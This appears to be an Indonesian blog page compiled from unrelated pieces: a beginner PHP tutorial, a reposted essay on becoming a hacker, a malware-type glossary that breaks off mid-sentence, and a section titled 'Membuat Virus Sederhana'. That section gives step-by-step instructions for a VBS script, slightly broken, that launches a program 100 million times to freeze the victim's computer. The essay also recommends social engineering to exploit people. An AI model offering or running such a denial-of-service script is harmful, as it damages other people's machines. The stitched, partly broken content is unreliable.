SELAMAT DATANG DI JURIG WARNET

Belajar PHP Dasar

--[Apa itu PHP ?]--
-----------------

PHP adalah sebuah script server side, maksudnya adalah script yang didigunakan
khusus web yang disisipkan kedalam Code HTML, dan script php akan dieksekusi
saat user memasuki / request halaman php kita, cara kerja request sebuah web
php adalah sebagai berikut :

Client (Browser) ==> Request Halaman PHP ==> Server (mengeksekusi script php
yang kita sisipkan kedalam html, hasil eksekusinya adalah halaman html murni
lalu dikirimkan ke Client) ==> Client (Browser akan menerima hasil eksekusi
dari server).



--[Penggunaan PHP Tags]--

Setiap Script PHP yang disisipkan pada sebuah html harus diawali dengan
tag pembuka php dan ditutup dengan tag penutup php, contohnya :

-------------Contoh---------------

<?php // pembuka PHP

//Isi Script dari php

?> <!--Tag Penutup dari PHP-->

----------------------------------

Tags <?php dan ?> disibut sebagai php tags semua code yang berada di dalam area
php tags akan dibaca sebagai PHP oleh server dan akan dieksekusi sedangkan code
yang berada diluar php tags akan dianggap sebagai tag html biasa.

selain tag <?php ?> ada tags lain yang berfungsi sama.

-XML style = <?php //script php ?>
-Short Style = <? //script php ?>
-Script Style = <SCRIPT LANGUAGE="php"> //script php </SCRIPT>
-ASP Style = <% //script php %>



--[WhiteSpace]--
Pada PHP whitespace seperti spasi dan enter tidak akan
berpengaruh pada output seperti halnya html.



--[Variables, Identifier and Comments]--

[1] Variables

Tipe data yang tersedia di php adalah :

- Integer (angka)
- Float (dipanggil juga double untuk angka berkoma)
- String (Huruf / Kata)
- Boolean (Hanya dapat menampung true dan false)
- Array (Dapat menampung banyak data)
- Object (dapat menampung turunan dari kelas)

Untuk pembuatan variables pada php hanya menggunakan "$" sebagai awalan dari
nama variable, contoh :

$nama = "Irsyad"; //Maka Variables nama akan otomatis menjadi type data String
$umur = 20; //Maka Variables umur akan otomatis menjadi type data Integer
$nama = 13; //Maka Variable akan otomatis berubah dari String menjadi Integer

dengan kata lain, Type data dari php adalah varian, jadi tergantung value atau
nilai yang dimasukan maka tipe data akan mengikuti sesuai nilai yang diberikan.
Dan untuk mencetakan sebuah kata atau sebuah variable dapat menggunakan keyword
echo, Contoh :

<?php
echo "Halo";
?>


[2] Identifier
Identifier adalah nama dari sebuah variable, fungsi, ataupun class.
Identifier tidak dibatasi panjang kata, dan dapat mengandung angka,huruf,dan
garis bawah.
Identifier tidak bisa di awali dengan angka.
Identifier di PHP case sensitif.

[3] Comments
untuk memberi comment pada baris PHP dapat menggunakan :

// Untuk Satu Baris

/* Untuk Banyak Baris */



--[Operator pada PHP]--

Operator adalah sebuah simbol yang dapat digunakan untuk memanipulasi
sebuah nilai.

Operator | Nama | Example
------------------------------------------------------
+ |Tambah |$a + $b
- |Kurang |$a - $b
* |Kali |$a * $b
/ |Bagi |$a / $b
% |Sisa Bagi |$a % $b


[1] Assignment operator (=) adalah operator untuk set nilai dari sebuah
variable contoh : $angka = 1;



--[Pre dan Post Increment dan Decrement]--

1. ++ = penambahan satu angka pada suatu variable contoh : $a = 1; $a++; //
hasilnya 2
2. -- = pengurangan satu angka pada suatu variable contoh : $a = 1; $a--; //
hasilnya 0
3. += = Menambahkan angka pada suatu dengan dirinya sendiri variable contoh :
$a = 1; $a+=2;
4. -= = Mengurangi angka pada suatu dengan dirinya sendiri variable contoh :
$a = 1; $a-=2;
5. /= = Membagi angka pada suatu dengan dirinya sendiri variable contoh :
$a = 1; $a/=2;
6. *= = Mengali angka pada suatu dengan dirinya sendiri variable contoh :
$a = 1; $a*=2;
7. %= = Memodulus angka pada suatu dengan dirinya sendiri variable contoh :
$a = 1; $a%=2;

[1] String Operator
$a = "Belajar ";
$b = "PHP";

$c = $a.$b;

Nilai dari $c = "Belajar PHP" '.' titik digunakan untuk menggabungkan string di
php.


--[Operator Perbandingan]--
Operator yang digunakan untuk membandingkan dua variable :
  Operator

== : Apakah variable yang dibandingkan sama nilainya
=== : Apakah variable yang dibandingkan identik sama, dari nilai sampai type
datanya
!= : Apakah variable yang dibandingkan tidak sama nilainya
!== : Apakah variable yang dibandingkan tidak identik sama, dari nilai sampai
type datanya
<> : Apakah variable yang dibandingkan tidak sama nilainya
< : Apakah variable yang disebelah kiri lebih kecil dari variable sebelah kanan
> : Apakah variable yang disebelah kiri lebih besar dari variable
sebelah kanan
<= : Apakah variable yang disebelah kiri lebih kecil sama dengan dari variable
sebelah kanan
>= : Apakah variable yang disebelah kiri lebih besar sama dengan dari variable
sebelah kanan
  Contoh :

$a == $b
$a === $b
$a != $b
dan seterusnya.


--[Operator Logika]--
Digunakan untuk membuat logika suatu kondisi :
  Operator
  && : Menandakan dan apakah kondisi 1 dan kondisi 2 sesuai

|| : Menandakan atauapakah kondisi 1 atau kondisi 2 sesuai

! : Menandakan tidak apakah kondisi 1 tidak kondisi 2 sesuai
Contoh

$a == 1 && $b == 1; // kedua syarat disana dicek apakah kedua variable bernilai1,
jika terjadi kesalahan salah satu maka akan menghasilkan
false;
  dan seterusnya.
  --[Seleksi]--
  [1] IF - Else

if adalah suatu keyword untuk melakukan sebuah seleksi yang dibantu dengan
operator perbandingan Contoh :

<?php
$angka = 1;
if($angka == 1)
{
echo "Angka adalah 1";
}
else
{
echo "Angka bukan 1";
}
?>

Penjelasan :
Jika angka diisi dengan 1 maka akan dicetak angka adalah 1 jika tidak akan
tercetak angka bukan 1.

-Switch Case
pada switch case di php dapat berupa angka atau String.
Contoh :

<?php
$input = 1;
switch($input)
{
case 1 : echo "Angka adalah satu";
break;
case 2 : echo "Angka adalah dua";
break;
default : echo "Angka tidak ditemukan";
} ?>

Penjelasan :
jika input bernilai 1 maka akan masuk ke case 1 dan mencetak Angka adalah satu,
dan jika setelah case 1 tidak dituliskan syntax break,maka setelah case 1
dicetak akan dicetak kembali case 2nya, maka dari itu syntax break harus ada
untuk membatasi antar case, dan jika input tidak bernilai 1 atau 2 maka akan
dicetak "Angka tidak ditemukan".

--[Perulangan]--
Perulangan digunakan untuk mengulang suatu syntax yang ada di dalam skop
perulangan, Contoh :


[1] While
While akan melakukan pengecekan kondisi pada contoh apakah angka < dari 3 jika
benar baru menjalankan syntax yang ada didalam while. dan akan berhenti ketika
kondisi bernilai false

<?php
$angka = 1;
while($angka < 3)
{
echo "$angka";
$angka++;
}

?>

Penjelasan :

di cek selama angka lebih kecil dari tiga akan dicetak nilai dari angka setelah
dicetak akan di increment atau ditambahkan 1 lalu akan di cek kembali apakan
angka masih lebih kecil dari tiga


[2] Do While
Do While akan melakukan Syntax yang ada di dalam do while baru melakukan cek
apakah sesuai kondisinya. akan berhenti ketika kondisi true.

<?php
$num = 0;
do{
echo "$num";
$num++;
}while($num != 3); ?>

Penjelasan : Mencetak nilai dari variable num lalu num di tambah 1 baru di cek
apakan num setelah ditambah 1 tadi masih tidak sama dengan 3.


[3] For
For digunakan untuk mengulang suatu syntax yang ada di dalam skop perulangan
for sama dengan while tapi prosesnya berbeda :
Contoh:
<?php
for($i = 0 ; $i < 3; $i++)
{
echo "$i";
}
?>

Penjelasan :
parameter dalam for terbagi jadi tiga (Dipisahkan menggunakan ;) pertama
merupakan initialisasi nilai awal dari variable i adalah 0 lalu kedua dicek
apakah variable i tadi lebih kecil dari 3 jika iya maka akan dilanjutkan untuk
mengeksekusi syntax dalam for ketiga akan mencetak nilai dari variable i
keempat variable i akan di increment (ditambahkan 1)

Cara Menjadi Hacker & Apa Yang Dipelajari?

Kali ini saya ingin berbagi mengenai bagaimana cara menjadi hacker dan apa yang harus di pelajari?
Pertanyaan ini sering sekali ditanyakan diberbagai kesempatan oleh banyak orang diberbagai komunitas yang masih mencari cara terbaik untuk menjadi seorang hacker.

Yang akan saya bahas pertama kali adalah Bagaimana Cara Menjadi Hacker. Caranya adalah sebagai berikut:
1. Persiapkan JiwaPersiapan jiwa ini adalah hal yang paling utama dalam menjadi seorang hacker, adapun hal yang perlu dipersiapkan adalah:
  • Mental dan psikologi:hal ini dibutuhkan karena seorang hacker akan mendapatkan banyak cobaan
    yang sering kali membuat down dan kadang membuat lupa diri. Seperti
    caci maki, hinaan, sanjungan dan perkataan manis.
  • Kesabaran, ketabahan dan keikhlasan:hal ini merupakan kunci kesuksesan seorang hacker dimana dengan hal ini
    akan membuat seorang hacker tidak akan pernah menyesali setiap tindakan
    yang diperbuat.
  • Semangat, usaha, kemauan, pantang menyerah dan kerja keras:hal ini dibutuhkan seorang hacker untuk berjuang menggapai yang terbaik
    didalam kehidupan yang dijalani, karena menjadi seorang hacker tidak
    mudah dan butuh waktu yang cukup untuk memahami setiap seluk beluk ilmu
    pengetahuan.
  • Percaya dan berserah diri hanya kepada Tuhan YME: hal ini menjadi pondasi paling penting dan salah satu motto yang digunakan oleh BinusHacker Family yaitu “Tuhan Hanya Engkau Yang Esa” dimana dengan hal ini semua akan dikembalikan kepada Sang Pencipta dan menyatakan bahwa Ilmu Pengetahuan itu Tanpa Batas.
2. Persiapkan RagaPersiapan
raga merupakan langkah kedua yang perlu dilakukan oleh seorang hacker,
dimana raga harus dibangun sedemikian rupa agar bisa mencapai target
yang diingikan. Hal yang perlu dipersiapkan adalah:
  • Kesehatan dan kebugaran:hal ini diperlukan agar seorang hacker tetap fit dalam menghadapi
    setiap tantangan dan perjuangan dalam mempelajari dan mencapai target
    yang sudah ditetapkan serta kemampuan memory, daya pikir otak, nurani,
    panca indra bisa dimaksimalkan.
  • Aktif Olahraga:hal ini diperlukan untuk menunjang latihan tubuh agar terhindar dari
    berbagai ancaman. Misalkan olahraga beladiri untuk melindungi diri
    ketika ada ancaman, fitness agar tubuh tetap aktif dan sehat  terjaga.
3. Persiapkan PerbuatanPersiapan
perbuatan adalah langkah ketiga  untuk menjadi seorang hacker, dimana
langkah yang perlu dijalani adalah langkah positif dalam kehidupan,
senantiasa beramal dan beribadah. Mengurangi, menghindari dan
meninggalkan hal-hal negatif adalah perjuangan panjang dan paling berat
untuk seorang hacker.
  • Belajar, Berbagi, Senantiasa Update dan Meningkatkan Kemampuan:hal ini menjadi pondasi paling penting dan salah satu motto yang
    digunakan oleh BinusHacker Family untuk bersama-sama meningkatkan
    kualitas dan kuantitas kemampuan yang dimiliki.
  • Saling Tolong Menolong, Persahabatan, Hindarkan SARA:hal ini diperlukan agar seorang hacker bisa berkontribusi dalam
    kehidupan yang global dimana semua sangat universal. Dengan menjadi
    seorang hacker maka diharuskan memiliki pandangan yang luas sehingga
    bisa bertindak dengan netral, baik, adil dan bijaksana.
Setelah persiapan diatas sudah terpenuhi, tinggal apa yang perlu kita pelajari untuk menjadi seorang hacker?

Ada 5 hal penting yang perlu dipelajari oleh seorang hacker:
1. Logika (Logic)
Seorang
hacker harus senantiasa menggunakan logika dimana hal ini menjadi
sebuah pertimbangan akal untuk menghasilkan sesuatu yang baik, benar dan
tepat. Manusia diberikan kelebihan oleh YME untuk hal ini, maka
manfaatkan secara maksimal.
Logika yang sering digunakan dalam bahasa pemrograman adalah OR, AND, NOT, XOR, NAND, dll. Beberapa program tersusun atas komponen program IF..THEN…ELSE, FOR..TO..DO, WHILE , CASE..OF dan lain-lainnya. Logika ini kemudian akan dikolaborasikan dengan matematika untuk menghasilkan sesuatu yang bernilai Benar (True) atau Salah (False) seperti (, =, +, -, dll).
2. Perangkat Keras (Hardware)
Seorang
hacker harus mengetahui seluk beluk perangkat keras, karena perangkat
keras merupakan dasar dari pembentukan teknologi. Perangkat keras disini
adalah mengerti seluk beluk pengkabelan, chip, mainboard, switch, hub, elektronika, dll.
Apabila seorang hacker sudah memahami perangkat keras, maka akan lebih
mudah dalam membuat instruksi untuk perangkat lunaknya. Pernah melihat
James Bond & Mission Impossible? Nah, diluarsana banyak orang
luarbiasa yang memahami hardware sangat dalam.
Yang perlu dipelajari lebih dalam dari perangkat kerasa adalah komponen pada bagian-bagian berikut:
  • Input Device (Unit Masukan: Keyboard, Mouse): media untuk memasukkan data dari luar ke dalam suatu memori dan processor.
  • Process Device (Unit Pemrosesan: CPU, Microchip,RAM): media untuk mengolah inputan guna menghasilkan informasi yang diperlukan.
  • Output Device (Unit Keluaran: Monitor, Scanner, Speaker): media untuk mengeluarkan hasil informasi.
  • Backing Storage ( Unit Penyimpanan: Harddisk, Disk): media untuk melakukan penyimpanan data dan informasi.
  • Periferal ( Unit Tambahan: USB, Modem): media tambahan yang digunakan untuk mendukung proses kerja perangkat keras.
3. Perangkat Lunak (Software)
Seorang
hacker akan mempelajari software sebagai instruksi kepada hardware
untuk melakukan perintah-perintah yang diinginkan. Software ini dibangun
dari berbagai bahasa, dimana bahasa yang perlu dipelajari dalam bahasa
mesin adalah 0, 1 dan analog. Sebagai dasar adalah bahasa pemrograman
adalah assembly. Urutan yang tepat sebagai berikut saya kutip dari
wikipedia:
  1. Bahasa Mesin, yaitu memberikan perintah kepada komputer dengan memakai kode bahasa biner, contohnya 01100101100110.
  2. Bahasa Tingkat Rendah (ASM) atau dikenal dengan istilah bahasa rakitan (bah.Inggris Assembly), yaitu memberikan perintah kepada komputer dengan memakai kode-kode singkat (kode mnemonic), contohnya MOV, SUB, CMP, JMP, JGE, JL, LOOP, dsb.
  3. Bahasa Tingkat Menengah(C), yaitu bahasa komputer yang memakai campuran instruksi dalam
    kata-kata bahasa manusia (lihat contoh Bahasa Tingkat Tinggi di bawah)
    dan instruksi yang bersifat simbolik, contohnya {, }, ?,
    >>, &&, ||, dsb.
  4. Bahasa Tingkat Tinggi(HTML, XML, JSP, JAVA, VB, PASCAL, DELPHI, C#, F#, PHP, ASP, SQL,
    ORACLE, PYTHON, PERL, dll) yaitu bahasa komputer yang memakai instruksi
    berasal dari unsur kata-kata bahasa manusia, contohnya begin, end, if,
    for, while, and, or, dsb.
Sebagai seorang hacker, semakin kompleks mengetahui bahasa pemrograman
maka akan semakin mudah dalam memolak balikkan software, mencari celah,
memperbaiki, memberikan solusi untuk memecahkan masalah dan bahkan
membangun sebuah aplikasi baru.
Kuncinya adalah semakin dalam mengetahui bahasa mesin, akan lebih mudah dalam berkomunikasi dengan mesin.
Selain
mengenal bahasa pemrograman, yang perlu dipelajari adalah sistem yang
dibangun dari software yang sudah ada saat ini, sebagai salah satu
contoh yaitu Sistem Operasi: *Nix, Linux, FreeBSD, SunOS, Windows, dll.
4. Jaringan (Networking)
Seorang
hacker perlu mengetahui dan mendalami jaringan elektronik dan komputer
yang merupakan bagian penting untuk dipelajari, karena jaringan inilah
yang menghubungkan antara satu dengan yang lainnya seperti sebuah jaring
laba-laba yang tidak terputus.
Ketika kita sudah memahami
jaringan maka akan cukup mudah dalam melakukan setting, konfigurasi dan
dapat memegang kendali terhadap jaringan. Didalam jaringan inilah alur
komunikasi bergerak antara satu perangkat ke perangkat yang lainnya.
Pada jaringan inilah banyak protokol komunikasi yang digunakan sehingga
perlu juga untuk dipelajari seperti TCP, HTTP/S, FTP/S,
dll. Apabila jaringan berada didalam kendali, maka seluruh informasi
yang mengalir didalamnya akan sangat mudah untuk didapat, ditambah,
diubah, bahkan untuk dihapus sekalipun.
5. Kriptografi (Cryptography)
Seorang hacker memiliki tantangan dalam hal kriptografi, karena saat ini hampir seluruh transaksi komunikasi sudah menggunakan cryptography sebagai jembatan pelindung.
Dengan modal logika yang matang maka cryptography dapat lebih mudah
untuk dipelajari walaupun dalam struktur yang sulit. Seorang hacker
memerlukan pengetahuan kriptografi untuk menjaga aspek keamanan
informasi seperti kerahasiaan informasi, keabsahan informasi, integritas
informasi, serta autentikasi informasi dan bahkan untuk mendapatkan dan
menerjemahkan informasi itu sendiri.
Ada banyak model kriptografi yang saat ini sudah banyak berkembang yaitu MD5, SHA, DES, AES, Base64, IDEA, BLOWFISH, RSA, Dll. Kriptografi ini banyak digunakan untuk konfigurasi, penyimpanan data dalam database, dan komunikasi transaksi pada jaringan.
Dengan memahami dan mempelajari kelima unsur diatas, saya rasa anda menjadi seorang hacker yang handal.
TAMBAHAN: Cara Unik Ala BinusHacker Family untuk menjadi Seorang Hacker, berikut ini beberapa hal yang sudah dikumpulkan pada forum: https://www.facebook.com/groups/binushacker/atau disini https://www.facebook.com/groups/binushacker/permalink/10152293574815464/
  1. Niat baik, berdoa, beretika, tekad yang kuat, selalu optimis dan ketekunan yang tak pernah berakhir.
  2. Banyak bertanya dan terus menyimak, terutama kepada ahlinya, kemudian ambil hikmah untuk dipelajari dan dikerjakan.
  3. Banyak begadang untuk belajar, mengoprek alat elektronik, komputer dan hal-hal mengasyikkan lainnya.
  4. Cari referensi ilmu pengetahuan sebanyak-banyaknya baik dari buku, jurnal, ebook, dll.
  5. Lakukan dengan sengaja merusak gadget dimulai dari dengan yang sederhana, kemudian memulai untuk memperbaiki gadget tersebut.
  6. Belajarteknik sosial engineering untuk mengetahui dan memanfaatkan manusia,
    belajar reverse engineering untuk mengetahui dan memanfaatkan komputer.
  7. Memiliki modal, kemauan yang kuat, berani gagal dan berani bertindak untuk melakukan penelitian.
  8. Jangan pernah malas untuk membaca artikel teknologi, berjalan-jalan mengelilingi blog (blogwalking), belajar jangan terpaku pada salah satu forum saja.
  9. Beranimelakukan instalasi beberapa OS pada komputer pribadi, misal Linux,
    Windows, VWWare, FreeBSD, dll. Kemudian belajar bahasa pemrograman dan
    scripting yang non-formal (Perl, Python, Ruby, dll).
  10. Persiapkan peralatan pribadi, dan peralatan lainnya yang didapat dari sumber lain untuk memulai proses hacking.
  11. Rajin berdoa kepada Tuhan YME dan berimajinasi yang penuh dengan ilusi agar mendapatkan inspirasi.
  12. KISS: Keep IT Simple Stupid, menjadikan IT sebagai sesuatu yang mudah seperti kegiatan sehari-hari.
  13. Wajibuntuk mengenali batasan dan kemampuan diri, agar bisa mengukur apa yang
    perlu untuk dilakukan dan tidak memaksakan sesuatu.
  14. Jangan bermimpi terlalu tinggi, karena saat jatuh akan terasa parah sakitnya.
  15. Jangan terlalu berdiam diri, tetapi tetap terus berinteraksi dengan rendah hati.
  16. Belajar berbicara dan berinteraksi dengan komputer dengan mempelajari bahasa yang digunakan untuk instruksi komputer.
  17. Jangan mudah menyerah saat dihina, dipermainkan, dibohongi, terus percaya diri dan selalu semangat.
  18. Persiapkan otak yang fun, agar tidak terlalu penat, selalu ceria dan bahagia dalam beraktifitas.
  19. BelajarIT basic merupakan hal yang penting, daripada sekedar menggunakan
    software yang sudah ada saat ini untuk kegiatan hacking.
  20. Jangan lupa istirahat, jangan lupa makan, jangan lupa minum, jangan lupa cemilan dan jangan lupa olah raga.
  21. Belajar untuk memahami concept, jangan copy paste sembarangan dan mulai dari hal yang paling kecil terlebih dahulu.
  22. Mengerti cara kerja hardware dan software sehingga menjadi selaras sejalan, berani merubah nya bisa juga mengembalikan nya.
  23. Sukaidan cintai dulu komputer, masuk keseluk-beluknya kemudian terus
    berlatih, perbanyak teman dan memecahkah masalah bersama-sama.
  24. Belajartidak bergantung kepada yang hanya disekolah saja, belajarlah dari
    dunia diluar sekolah dan ulangi hal-hal yang sama untuk mempermudah dan
    menjadi kebiasaan.
  25. Belajar dasar-dasarnya dari situs www.binushacker.net kemudian lanjut ketingkat yang lebih tinggi lagi, apabila tidak ada di www.binushacker.net maka carilah dari search engine seperti google, bing, yahoo, baidu, yandex, allwebsite, dll.
Semoga apa yang sudah dibagi ini bisa bermanfaat untuk semua orang yang ada di seluruh nusantara khususnya dan yang ada dibelahan dunia manapun

Thanks & goodluck for all. Enjoy & Eat It!  Sumber: Binus Hacker

Membuat Virus Sederhana

Membuat virus bukanlah merupakan hal
yang sulit. Karena, kita dapat membuatnya dengan notepad yang terdapat di semua
komputer yang memakai Windows.

Virus yang akan kita buat ini,
adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan
sama sekali.



Let`s Begin!



langkah-langkah:



1. buka notepad

2. copy+paste bahasa pemograman(yang
bercetak tebal) di bawah ini:

@echo off

option explicit



dim wshshell

set
wshshell=wscript.createobject("wscript.shell")



dim x

for x = 1 to 100000000

wshshell.run
"tourstart.exe"

next





3. Save notepad dengan nama virus.vbs
( pastikan ”save as type” diubah ke ”all files”)

4. Ingat!! jangan klik file
tersebut. Karena komputer anda akan dipenuhi oleh 100000000

tourstart yang akan memenuhi layar
anda, dan akan membuat komputer hang total

sebelum anda mendelete semuanya.

5. bila ingin mencoba virus ini.
silahkan membuat ulang program, dengan perbedaan

ubah 100000000 ke 10, untuk
percobaan. maka setelah anda mengklik program.

layar anda akan dipenuhi oleh hanya
10 tourstart saja.

Apa Itu Malware ???

Mungkin sebagian anda sudah sering
mendengarnya, tetapi mungkin hanya sebagian orang yang tau tentang Malware.
berikut ini saya akan coba memberikan beberapa keterangan dan informasi tentang
apa itu dan apa saja yang termasuk ‘Malware’



‘Malware” adalah program komputer
yang di ciptakan dengan maksud dan tujuan tertentu dari penciptanya dan
merupakan program yang mencari kelemahan dari software.Umumnya Malware
diciptakan untuk membobol atau merusak suatu software atau operating sistem.

Berikut ini mungkin dapat membantu,
definisi menurut Wikipedia:



Malware (a portmanteau of “malicious
software”) is software designed to infiltrate or damage a computer system,
without the owner’s consent. The term describes the intent of the creator,
rather than any particular features. Malware is commonly taken to include
computer viruses, Trojan horses, and spyware. In law, malware is sometimes
known as a computer contaminant, for instance in the legal codes of California,
Virginia, and several other U.S. states. Malware is sometimes pejoratively
called scumware. Malware should not be confused with defective software, that
is, software which has a legitimate purpose but contains errors or bugs



.======================================================================



-=Virus=-

Inilah istilah yang sering dipakai
untuk seluruh jenis perangkat lunak yang mengganggu computer. Bias jadi karena
inilah tipe malware pertama yang muncul. Virus bisa bersarang di banyak tipe
file. Tapi boleh dibilang, target utama vireus adalah file yang bisa dijalankan
seperti EXE, COM dan VBS, yang menjadi bagian dari suatu perangkat lunak. Boot
sector juga sering dijadikan sasaran virus untuk bersarang. Beberapa file
dokumen juga bisa dijadikan sarang oleh virus. Penyebaran ke computer lain
dilakukan dengan bantuan pengguna computer. Saat file yang terinfeksi
dijalankan di computer lain, kemungkinan besar computer lain itu akan
terinfeksi pula. Virus mencari file lain yang bisa diserangnya dan kemudian
bersarang di sana.Bisa juga virus menyebar melalui jaringan peer-to-peer yang
sudah tak asing digunakan orang untuk berbagi file.



======================================================================



-=Worm=-

Worm alias cacing, begitu
sebutannya. Kalau virus bersarang pada suatu program atau dokumen,
cacing-cacing ini tidak demikan. Cacing adalah sebuah program yang berdiri
sendiri dan tidak membutuhkan sarang untuk menyebarkan diri. Hebatnya lagi,
cacing bisa saja tidak memerlukan bantuan orang untuk penyebarannya. Melalui
jaringan, cacing bisa “bertelur” di computer-komputer yang terhubung dalam
suatu kerapuhan (vulnerability) dari suatu system, biasanya system operasi.

Setelah masuk ke dalam suatu
computer, worm memodifikasi beberapa pengaturan di system operasi agar tetap
hidup. Minimal, ia memasukkan diri dalam proses boot suatu computer. Lainnya,
mungkin mematikan akses ke situs antivirus, menonaktifkan fitur keamanan di
system, dan tindakan lain.



======================================================================



-=Wabbit=-

Istilah ini mungkin asing, tapi
memang ada malware tipe ini. Seperti worm, wabbit tidak membutuhkan suatu
program dan dokumen untuk bersarang. Tetapi berbeda dengan worm, wabbit tidak
membutuhkan suatu program dan dokumen untuk bersarang. Tetapi berbeda dengan
worm yang menyebarkan diri ke computer lain menggunakan jaringan, wabbit
menggandakan diri secara terus-menerus didalam sebuah computer local dan hasil
penggandaan itu akan menggerogoti system.

Kinerja computer akan melambat
karena wabbit memakan sumber data yang lumayan banyak. Selain memperlambat
kinerja computer karena penggunaan sumber daya itu, wabbit bisa deprogram untuk
memiliki efek samping yang efeknya mirip dengan malware lain.
Kombinasi-kombinasi malware seperti inilah yang bisa sangat berbahaya.



======================================================================



-=Keylogger=-

Hati-hati kalau berinternet di
warnet. Bisa saja pada computer di warnet itu diinstall suatu perangkat lunak
yang dikenal dengan istilah keylogger yang mencatat semua tekanan tombol
keyboard.

Catatan yang disimpan dalam suatu
file yang bisa dilihat kemudian itu lengkap. Di dalamnya bisa terdapat
informasi seperti aplikasi tempat penekanan tombol dilakukan dan waktu
penekanan. Dengan cara ini, seseorang bisa mengetahui username, password dan
berbagai informasi lain yang dimasukkan dengan cara pengetikan.



Pada tingkat yang lebih canggih,
keylogger mengirimkan log yang biasanya berupa file teks itu ke seseorang.
Tentu saja itu dilakukan tanpa sepengetahuan si korban. Pada tingkat ini pula
keylogger bisa mengaktifkan diri ketika pengguna computer melakukan tindakan
tertentu.Misalnya begini. Ketika pengguna computer membuka situs e-banking,
keylogger aktif dan mencatat semua tekanan pada keylogger aktif dan mencatat
semua tekanan pada keyboard aktif dan mencatat semua tekanan pada keyboard di
situs itu dengan harapan nomor PIN dapat dicatat.



Keylogger ini cukup berbahaya karena
secanggih apa pun enkripsi yang diterapkan oleh suatu website, password tetap
dapat diambil. Pasalnya, password itu diambil sebelum sempat dienkripsi oleh
system. Jelas dong. Keylogger merekam sesaat setelah password diketikkan dan
belum diproses oleh system.



======================================================================



-=Browser Hijacker=-

Browser hijacker mengarahkan browser
yang seharusnya menampilkan situs yang sesuai dengan alamat yang dimasukkan ke
situs lain.Itu contoh paling parah dari gangguan yang disebabkan oleh browser
hijacker. Contoh lain yang bisa dilakukan oleh pembajak ini adalah menambahkan
bookmark, mengganti home page, serta mengubah pengaturan browser.



Bicara mengenai browser di sini
boelh yakin 100% browser yang dibicarakan adalah internet explorer. Selain
karena internet explorer adalah buatan Microsoft, raksasa penghasil perangkat
lunak yang produknya sering dijadikan sasaran serangan cracker, internet
explorer adalah browser yang paling banyak digunakan orang berinternet. Tak
heran, internet explorer telah menyatu dengan Windows, system operasi milik
Microsoft yang juga banyak diserbu oleh cracker.



======================================================================



-=Troya=-

Troya (Trojan) adalah malware yang
seolah-olah merupakan program yang berguna, yang menghibur, yang menyelamatkan,
padahal di balik itu, ia merusak. Kuda ini bisa ditunggangu oleh malware lain
seperti seperti virus, worm, spyware. Troya dapat digunakan untuk menyebarkan
atau mengaktifkan mereka.



======================================================================



-=Spyware=-

Spyware adalah perangkat lunak yang
mengumpulkan dan mengirim informasi tentang pengguna computer tanpa diketahui
oleh si pengguna itu.Informasinya bisa yang tidak terlampau berbahaya seperti
pola berkomputer, terutama berinternet, seseorang sampai yang berbahaya seperti
nomor kartu kredit, PIN untuk perbankan elektronik (e-banking) dan password
suatu akun.

Informasi tentang pola berinternet,
telah disebutkan, tidak terlampau berbahaya. Situs yang dikunjungi, informasi
yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware.

Selanjutnya, informasi itu digunakan
untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu
berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali
seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul
akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah
istilah untuk spyware yang begini.

Penyebaran spyware mirip dengan
Trojan. Contohnya, flashget. Ketika flashget yang dipakai belum deregister,
flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet,
jalankan flashget yang belum deregister, cuekin computer beberapa saat, pasti
muncul jendela internet explorer yang menampilkan iklan suatu situs.



======================================================================



-=Backdoor=-

Ini namanya main belakang. Kepingin
cepat dapat Surat Izin mengemudi. Dari pada lewar prosedur standar yang
mengharuskan test ini dan test itu, mendingan siapkan duit buat nyogok aparat.
SIM cepat di dapat tanpa antre lama, tanpa test ini dan itu.

Tidak berbeda dengan dengan contoh
bikin SIM tadi, dengan melanggar prosedur, malware berusaha masuk ke dalam system
untuk mengakses sumber daya serta file. Berdasarkan cara bekerja dan perilaku
penyebarannya, backdoor dibagi menjadi 2 grup. Grup pertama mirip dengan Troya.
Mereka secara manual dimasukkan ke dalam suatu file program pada perangkat
lunak dan kemudian ketika perangkat lunak itu diinstall, mereka menyebar. Grup
yang kedua mirip dengan worm.

Backdoor dalam grup ini dijalankan
sebagai bagian dari proses boot.Ratware adalah sebutan untuk backdoor yang
mengubah computer menjadi zombie yang mengirim spam. Backdoor lain mampu
mengacaukan lalu lintas jaringan, melakukan brute force untuk meng-crack
password dan enkripsi., dan mendistribusikan serangan distributed denial of
service.



======================================================================

-=Dialer=-

Andaikat computer yang digunakan,
tidak ada hujan atau badai, berusaha menghubungkan diri ke internet padahal tak
ada satu pun perangkat lunak yang dijalankan membutuhkan koneksi, maka layaklah
bercuriga. Computer kemungkinan telah terjangkit oleh malware yang terkenal
dengan istilah dialer.



Dialer menghubungkan computer ke
internet guna mengirim kan informasi yang didapat oleh keylogger, spyware tau
malware lain ke si seseorang yang memang bertujuan demikian. Dia dan penyedia
jasa teleponlah yang paling diuntungkan dengan dialer ini



.======================================================================



-=Exploit dan rootkit=-

Kedua perangkat ini bisa dibilang
malware bisa pula tidak. Kenapa begitu? Penjelasanya kira-kira begini. Exploit
adalah perangkat lunak yang menyerang kerapuhan keamanan (security
vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan
aksi yang tidak diinginkan. Banyak peneliti keamanan computer menggunakan
exploit untuk mendemonstrasikan bahwa suatu system memiliki kerapuhan. Memang
ada badan peneliti yang bekerja sama dengan produsen perangkat lunak. Peneliti
itu bertugas mencari kerapuhan dari sebuah perangkat lunak dan kalau mereka
menemukannya, mereka melaporkan hasil temuan ke si produsen agar si produsen
dapat mengambil tindakan. Namun begitu exploit kadang menjadi bagian dari suatu
malware yang bertugas menyerang kerapuhan keamanan.



Berbeda dengan exploit yang secara
langsung menyerang system, rootkit tidak demikian. Rootkit dimasukkan ke dalam
computer oleh penyerang setelah computer berhasil diambil alih.

Rootkit berguna untuk menghapus
jejak penyerangan, seperti menghapus log dan menyembunyikan proses malware itu
sendiri. Rootkit juga bisa mengandung backdoor agar di hari depan nanti, si
penyerang bisa kembali mengambil alih system.Rootkit ini sulit di deteksi,
pasalnya rootkit ditanam pada system operasi di level kernel, level inti system
operasi.



Cara terbaik yang bisa diandalkan
